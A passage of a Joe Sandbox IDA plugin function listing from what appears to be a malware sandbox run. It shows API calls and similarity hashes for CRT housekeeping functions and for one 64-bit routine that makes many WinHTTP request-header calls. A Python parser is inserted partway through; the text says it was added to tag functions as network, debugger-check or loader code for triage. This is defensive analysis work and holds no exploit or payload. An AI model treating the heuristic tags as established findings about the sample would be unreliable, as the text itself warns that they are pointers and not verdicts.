                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 641f924ba7bc3869e0f6b117d50612a5925985570150c7013b002e106ee6a1a6
                                        • Instruction ID: 9583ced39277175aeec79b39128d2b234c84efb251ecccf4edc34c2dfa24dea5
                                        • Opcode Fuzzy Hash: 641f924ba7bc3869e0f6b117d50612a5925985570150c7013b002e106ee6a1a6
                                        • Instruction Fuzzy Hash: 5CC00274004645641F503EBE11223A91300F89779FB8430C0AD41D65435D4648EE6677
                                        APIs
                                          • Part of subcall function 00851050: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00864A84), ref: 00851053
                                          • Part of subcall function 00851050: GetLastError.KERNEL32(?,00000000,?,00864A84), ref: 0085105D
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0085100A), ref: 00851FBC
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0085100A), ref: 00851FCB
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00851FC6
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                         • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                         • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 450123788-631824599
                                        • Opcode ID: e9c7f25e1851a7facd8ceed42385f904a9ca7ed52eb20823898cd92e07441c7d
                                        • Instruction ID: cb0d5d0942bb00451085e4111ab668c7ea231dfa7fc745fa9f013d50afab2d76
                                        • Opcode Fuzzy Hash: e9c7f25e1851a7facd8ceed42385f904a9ca7ed52eb20823898cd92e07441c7d
                                        • Instruction Fuzzy Hash: BCE0ED70204B518FDB619F69E4083567BE4FF04746F44886DEE56C3682EBB5D44C8B92
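The entries above are the raw per-function export of the Joe Sandbox IDA plugin: for each function, its direct API references (with "Part of subcall function" lines for calls one level down), any recovered strings, the memory dump it came from, and the Opcode ID / Instruction Fuzzy Hash pair used for similarity lookups. Almost all of the 0x850000 module's functions listed here are CRT housekeeping (`_free`, `HeapAlloc`, `LoadLibraryExW` resolving `FlsSetValue`, the ATL `CAtlBaseModule` check), and the one function that matters, the 64-bit WinHTTP routine that follows, is buried among them. The parser below is an added example, not Joe Sandbox code: it reads this listing format into records and tags each function by its direct calls so the network and debugger-check functions sort to the top. The tag names and the API-to-tag table are this example's own assumptions; the sample input is copied from entries on this page, trimmed to a few lines each.

```python
"""Parse the per-function "APIs / Similarity" blocks exported by the Joe Sandbox IDA plugin (the format
of the listing on this page) and tag each function by what it calls, so network or debugger-check code
stands out among thousands of CRT-noise blocks. Added example, not Joe Sandbox code; tags are assumptions."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
# "Name.MODULE(args), ref: ADDR", or "Name.MODULE ref: ADDR" when no argument list was recovered
CALL_RE = re.compile(r"^(?P<name>[A-Za-z_][\w@$]*)\.(?P<module>[A-Z0-9_]+)"
                     r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: [0-9A-Fa-f]+$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME"}
TAGS = {  # assumed mapping: which direct calls make a function worth an analyst's time
    "network": lambda c: c.module in {"WINHTTP", "WININET", "WS2_32"},
    "debugger-check": lambda c: c.name in {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"},
    "loader": lambda c: c.name in {"LoadLibraryExW", "LoadLibraryW", "LoadLibraryA", "GetProcAddress"},
}
# caller is None for the function's own calls, else the address from "Part of subcall function <addr>"
Call = namedtuple("Call", "name module args ref caller")

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # Opcode ID, Instruction Fuzzy Hash, Source File, ...

def parse_blocks(text):
    """Split the listing into FunctionBlocks; every complete block ends at its Instruction Fuzzy Hash."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            caller = None
            if m := SUBCALL_RE.match(item):
                caller, item = m["caller"].upper(), m["rest"]
            if m := CALL_RE.match(item):
                args = m["args"].split(",") if m["args"] else []
                cur.calls.append(Call(m["name"], m["module"], args, m["ref"].upper(), caller))
        elif section == "Strings":
            if m := STRING_RE.match(item):
                cur.strings.append(m["text"])
        elif section is not None:
            key, _, value = item.partition(":")
            cur.meta[key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = FunctionBlock()
    if cur.calls or cur.meta:  # listing cut off before the closing hash line
        blocks.append(cur)
    return blocks
def direct_calls(block):  # names the function body itself calls, in listed order
    return [c.name for c in block.calls if c.caller is None]
def tag_block(block):
    direct = [c for c in block.calls if c.caller is None]
    tags = {tag for tag, hit in TAGS.items() if any(hit(c) for c in direct)}
    if direct and all(c.module in CRT_MODULES for c in direct):
        tags.add("crt-only")  # msvcrt/vcruntime housekeeping, safe to skip
    return sorted(tags)

def triage(text):
    """(Opcode ID prefix, tags, direct calls) per block: tagged blocks first, CRT-only last."""
    rows = [(b.meta.get("Opcode ID", "")[:12], tag_block(b), direct_calls(b)) for b in parse_blocks(text)]
    rows.sort(key=lambda r: ("crt-only" in r[1], -len(r[1])))
    return rows

# Constructed input: four entries copied from the listing above, trimmed to a few lines each; the
# last one (the 64-bit WinHTTP function) is cut off in the listing too and so has no hash line.
SAMPLE = """\
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00858512
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085855B
  • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
Similarity
• Opcode ID: 97432a34f527a5cc29b0f92cded2d032d4804e7fca5d80e5d773857b5e61fcba
• Instruction Fuzzy Hash: F701DD72901615BF6321577A5C88C7B6A6CFAC2FA3318412AFD04E3141FE648D0D41B1
APIs
• _free.LIBCMT ref: 00856639
Similarity
• Opcode ID: 7d66ed1dea3eb52bb702b4c2e63945a117bc36cb46bb02c7573782bc11d57813
• Instruction Fuzzy Hash: 4AF01D794042A0AFCB02AF68ED424153BA0FB04735396660BF814E7375FBF109799BC5
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,0085100A), ref: 00851FBC
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0085100A), ref: 00851FCB
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00851FC6
Similarity
• Opcode ID: e9c7f25e1851a7facd8ceed42385f904a9ca7ed52eb20823898cd92e07441c7d
• Instruction Fuzzy Hash: BCE0ED70204B518FDB619F69E4083567BE4FF04746F44886DEE56C3682EBB5D44C8B92
APIs
• WinHttpOpen.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D2EC3
• WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3089
"""
```

`triage(SAMPLE)` returns the debugger-check and network functions first, the untagged environment-block function next, and the `_free`-only block last. Two caveats a practitioner should keep in mind when reading the tags: the `IsDebuggerPresent` hit sits next to the "Unable to initialize critical section in CAtlBaseModule" string, which is ATL's own startup check rather than an evasion routine, and a "loader" hit whose arguments include `FlsSetValue` (as in the `LoadLibraryExW` entry above) is the CRT resolving its own thunks. The tags are pointers to what to open in the disassembler, not verdicts.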
                                        APIs
                                        • WinHttpOpen.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D2EC3
                                        • WinHttpConnect.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D2F10
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3072
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3089
                                        • WinHttpSetOption.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D31AA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D31C6
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D31E1
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D34DC
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D34F7
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D359D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35B8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35CD
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35E8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35FD
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3618
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D362D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3648
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D365D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3678
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D368D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36A8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36BD
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36D8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36ED
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3708
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D371D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3738
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D374D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3768
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3813
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D382E
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3843
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D385E
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3873
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D388E
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D38A3
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D38BE
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3969
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3984
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3999
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39B4
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39C9
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39E4
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39F9
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3A14
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3A29
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3A44
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3AEF
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B0A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B1F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B3A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B4F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B6A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B7F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B9A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BAF
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BCA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BDF
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BFA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C0F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C2A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C3F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C5A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C6F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C8A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C9F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3CBA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3D65
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3D80
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3D95
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DB0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DC5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DE0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DF5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E10
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E25
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E40
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E55
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E70
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E85
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3EA0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3EB5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3ED0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3EE5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3F00
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3F15
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3F30
                                          • Part of subcall function 00007FF72F5D2DB0: WinHttpQueryAuthSchemes.WINHTTP ref: 00007FF72F5D2DCE
                                        • WinHttpReceiveResponse.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4403
                                        • WinHttpQueryHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4435
                                        • WinHttpQueryHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D447F
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D47FE
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4804
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D480A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4822
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4852
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D486A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D48AC
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D48EE
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4930
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4972
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D49B4
                                          • Part of subcall function 00007FF72F5D64F0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D65D3
                                          • Part of subcall function 00007FF72F5D64F0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72F5D65D9
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4AEC
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4B04
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4B46
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4B88
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4BCA
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4BFA
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4C12
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4C54
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4C96
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4CD8
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4D4A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4D62
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4DA4
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4DE6
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4E28
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4E6A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4EAC
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4EEE
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4F30
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D51CA
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D520C
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D524E
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D5290
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D52C0
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D52D8
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D531A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D535C
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D539E
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D53E0
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D5422
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D5464
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Http$Headers$Requestlstrlen$ErrorLast$_invalid_parameter_noinfo_noreturn$Query$AuthConcurrency::cancel_current_taskConnectOpenOptionReceiveResponseSchemes
